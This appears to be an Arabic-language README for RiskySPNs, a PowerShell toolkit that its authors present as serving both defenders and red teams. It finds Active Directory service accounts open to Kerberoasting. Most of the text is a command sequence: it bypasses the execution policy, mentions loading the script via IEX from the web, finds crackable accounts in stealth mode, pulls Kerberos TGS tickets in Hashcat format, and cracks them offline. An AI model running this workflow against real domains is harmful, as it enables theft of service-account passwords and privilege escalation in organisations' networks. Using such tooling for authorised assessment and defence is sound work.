
كشف واستغلال SPNs الخطيرة
RiskySPNs عبارة عن مجموعة من سكريبتات PowerShell تركز على كشف واستغلال الحسابات المرتبطة بـ SPNs (اسم الخدمة الرئيسي). يمكن لهذه الوحدة مساعدة الفرق الزرقاء في تحديد حسابات SPNs التي قد تكون خطرة، وكذلك الفرق الحمراء في تصعيد الامتيازات باستخدام Kerberos و Active Directory.
للحصول على معلومات مفصلة: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
أو قم فقط بتحميل السكريبت (يمكنك أيضًا استخدام IEX من الويب)
. .\Find-PotentiallyCrackableAccounts.ps1
تأكد من أن Set-ExecutionPolicy مضبوطة على Unrestricted أو Bypass
Get-Help Get-TGSCipher -Full
جميع الدوال تحتوي أيضًا على وضع -Verbose
العثور على حسابات ضعيفة
Find-PotentiallyCrackableAccounts
حساسة + RC4 = $$$
إنشاء تقرير كامل ومفصل عن الحسابات الضعيفة (CISO <3)
Export-PotentiallyCrackableAccounts
طلب Kerberos TGS لـ SPN
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
أو
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3